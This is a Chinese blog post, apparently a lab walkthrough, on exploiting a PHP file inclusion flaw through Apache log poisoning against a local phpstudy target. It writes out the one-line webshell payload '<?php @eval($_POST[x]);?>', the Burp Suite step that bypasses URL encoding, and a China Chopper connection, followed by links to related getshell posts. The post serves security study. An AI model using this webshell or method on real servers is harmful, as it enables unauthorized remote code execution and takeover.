文件包含漏洞——配合日志文件

最新推荐文章于 2024-06-20 20:30:56 发布
最新推荐文章于 2024-06-20 20:30:56 发布
阅读量2.6k 收藏 9
点赞数 5
分类专栏: # 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/103757259
版权

此实验中用的是phpstudy2018
靶机IP地址:192.168.212.131

一、前提条件

phpstudy中日志功能默认关闭,得手动修改配置文件开启apache日志功能
在这里插入图片描述
重启phpstudy,访问日志文件存在
在这里插入图片描述

二、文件包含漏洞测试

第一步:输入<?php phpinfo();?>进行测试
在这里插入图片描述
利用文件包含漏洞查看各个输入的内容是否存在与日志文件内
在这里插入图片描述
发现<?php phpinfo();?>已被转义成%3C?php%20phpinfo();?%3E
第二步:既然被转移,那就结合burpsuite抓包修改
开启burpsuite抓包,输入<?php phpinfo();?>继续进行测试
在这里插入图片描述
拦包修改被转义的内容
在这里插入图片描述
在这里插入图片描述
修改之后放包,再去文件包含日志文件,发现<?php phpinfo();?>已被执行
在这里插入图片描述

三、文件包含漏洞利用

第一步:输入一句话 <?php @eval($_POST[x]);?>
在这里插入图片描述
拦包修改被转义的内容
在这里插入图片描述
在这里插入图片描述
第二步:访问日志文件,查看没有一句话 内容,说明一句话 muma被当作php语言正常解析运行了
在这里插入图片描述
第三步:中国菜刀连接muma文件
在这里插入图片描述
添加成功之后,双击查看,成功链接
在这里插入图片描述
更多资源:

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程

收集整理在知识星球,可加入知识星球进行查看。
在这里插入图片描述

W小哥1
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全】日志注入getshell
等风来
12-26 2345
中间件的日志文件通常用于保存网站的访问记录,其中包括了客户端发送的HTTP请求行、User-Agent、Referer等信息。这些日志文件对于网站的运维和安全分析非常有用。如果能够在HTTP请求中插入恶意代码,那么这些恶意代码就会被保存到日志文件中。当访问日志文件时,其中的恶意代码可能会被执行
文件包含漏洞-日志注入
superman66697的博客
08-16 1298
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全的日志处理机制和文件包含漏洞的组合。
CTF中文件包含漏洞总结
最新发布
qq_64395221的博客
06-20 1179
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
文件包含漏洞】——文件包含漏洞进阶_日志文件包含利用
weixin_45588247的博客
08-05 2884
文章目录一、实验目的:二、工具:三、实验环境:四、原理说明:1. 原理:2. 利用方法:五、日志文件相关:1. 日志文件路径:2. 没有access.log访问日志的原因:3. 开启`access.log`访问日志功能:六、实验过程: 一、实验目的: 1、通过学习日志文件包含漏洞,掌握在目标服务器存在文件包含漏洞的前提下没有上传功能下获取权限的方法。 2、通过搭建漏洞环境,学习绕过技巧。 二、工具: 火狐/谷歌浏览器 burpsuite 三、实验环境: 靶 机: windows10虚拟机:192.
文件包含和命令注入漏洞
THTBOOM的博客
08-20 4023
文件包含和命令注入漏洞 文件包含漏洞 介绍 文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,让服务器端执行,代码注入的典型代表就是文件包含file inclusion。文件包含可能会出现在JSP、PHP、ASP中。 常见的导致文件包含的函数: PHP: include() include_once() require() require_once() fo...
JSP源码——javapms-1.2-beta.zip
10-06
【JSP源码——javapms-1.2-beta.zip】是一个包含JSP(JavaServer Pages)源代码的压缩包,版本为1.2-beta。这个项目可能是一个早期的、测试性质的web应用程序,用于展示或者提供了一套管理平台的服务。在深入探讨...
PHP实例开发源码——PHP华盾防火墙源码.zip
11-25
【标题】"PHP实例开发源码——PHP华盾防火墙源码.zip" 是一个包含PHP编程语言实现的防火墙源代码的压缩包。这个防火墙可能是用于网站安全防护的,帮助抵御恶意攻击和非法访问,保护服务器和用户数据的安全。 在PHP...
ASP.NET源码——ASP.NET Web BackDoor.zip
10-10
4. **权限提升**:如果后门能够获得更高的系统权限,那么它可能可以执行更危险的操作,如篡改数据库、读取敏感文件或安装其他恶意软件。 5. **日志清除**:为了掩盖活动,后门可能会删除或篡改服务器的日志记录,...
配合PostgreSQL使用
02-16
压缩包中的文件“pgadmin4-4.0-x86.exe”是PostgreSQL的管理工具——pgAdmin4的安装程序,版本为4.0,适用于32位(x86)的Windows系统。pgAdmin4是一个图形用户界面(GUI)工具,用于管理和开发PostgreSQL数据库。...
Linux安全操作系统构建方法与技术(第五讲)——隐蔽通道和安全审计.pdf
09-07
安全审计子系统通常包括日志系统、监控工具和事件审计机制等,用于记录和分析系统的操作行为,帮助检测潜在的攻击和滥用。 在构建Linux安全操作系统时,应对隐蔽通道进行严格控制,限制不必要的共享资源访问,采用...
漏洞复现篇——文件包含漏洞进阶-日志文件漏洞
爱国小白帽
02-19 1819
日志文件漏洞原理 当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。 Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中 例如:http://192...
文件包含漏洞包含日志文件获取Shell实战
永远是少年
12-14 984
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞包含日志文件获取Shell实战。 一、文件包含漏洞包含日志文件获取Shell简介 二、文件包含漏洞包含日志文件获取Shell实战
包含日志文件getshell
weixin_33843947的博客
09-08 1844
包含日志文件getshell 一、包含日志文件漏洞利用概述 当我们没有上传点,并且也没有url_allow_include功能时,我们就可以考虑包含服务器的日志文件。 利用思路也比较简单,当我们访问网站时,服务器的日志中都会记录我们的行为,当我们访问链接中包含PHP一句话木马时,也会被记录到日志中。 这时候我们如果知...
包含日志文件
arissa666的博客
09-22 261
Apache没有原理:某个PHP文件存在本地包含漏洞,却无法上传正常文件包含漏洞却不能利用,攻击者就有可能会利用apache日志文件来入侵。Apache服务器运行后会生成两个日志文件,这两个文件是访问日志和error.log(错误日志apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4319
文件包含漏洞就是使用函数去包含任意文件的时候,当包含文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含
qq_63527808的博客
10-22 279
程序开发人员一般希望代码更灵活,所以将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。程序在引用文件的时,引用的文件名,用户可控的情况,传入的文件名没有经过合理的校验或校验不严,从而操作了预想之外的文件,就有可能导致文件泄漏和恶意的代码注入。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含
CTFshow刷题日记-WEB-黑盒测试(web380-395)文件包含日志包含getshell、SQL注入
Love&Share
10-07 3112
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
文件包含日志中毒(User-Agent)
qq_50854662的博客
09-28 476
文件包含日志中毒(User-Agent)
CTF挑战:Web安全漏洞——任意文件上传与下载实战
利用文件上传漏洞的步骤包括: 1. **定位上传路径**:通过检查响应或尝试上传测试文件来确定文件存储的位置,如果没有明确提示,可能需要手动创建一个文件来触发响应。 2. **绕过文件类型检查**:通过修改前端代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值